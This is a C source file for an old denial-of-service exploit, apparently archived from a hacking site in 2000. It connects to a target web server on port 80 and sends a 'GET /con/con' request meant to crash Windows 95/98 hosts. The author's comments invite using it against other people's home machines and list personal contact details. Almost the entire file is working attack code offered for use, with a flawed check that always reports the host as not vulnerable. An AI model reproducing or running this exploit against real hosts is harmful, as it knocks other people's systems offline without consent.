/*
  winweb.c by Kork

  this little exploit is designed to exploit the /con/con bug
  under windows 95/98
  its rare to find one running a webserver but im sure all those nice
  icq people will be running them just for you

  contact information
  IRC: irc.narknet.net #!0x7f
  E-Mail: castrol@eisa.net.au
  ICQ: 7362366
  Comments suggestions and flames welcome
  thats all from me for now enjoy
*/

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define PORT 80
char death[]= {
  "GET /con/con HTML/1.0\n\n\n"
};

int main(int argc, char *argv[]) {
  int sockfd;
  char buf[1024];
  struct hostent *ha;
  struct sockaddr_in sa;
  if (argv[1] == NULL) {
    printf("Usage: %s <HOST/IP>\n", argv[0]);
    exit(0);
  }

  if (!(ha = gethostbyname (argv[1])))
    perror ("gethostbyname");

  bzero (&sa, sizeof (sa));
  bcopy (ha->h_addr, (char *) &sa.sin_addr, ha->h_length);
  sa.sin_family = ha->h_addrtype;
  sa.sin_port = htons (PORT);
    
  if ((sockfd = socket (ha->h_addrtype, SOCK_STREAM, 0)) < 0) {
    perror ("socket");
    exit (1);
  }
  printf("Connecting\n");
  if (connect (sockfd, (struct sockaddr *) &sa, sizeof(sa)) < 0) {
    perror ("connect");
    exit (1);
  }
  printf("Connected...\nSending our nice code\n");
  send(sockfd, death, sizeof(death), 0);
  read(sockfd, buf, 1024, 0);
  if (buf != NULL) {
    printf("Host is not vulnerable\n");
    close(sockfd);
  }
}
/*                   www.hack.co.za   [8 September 2000]*/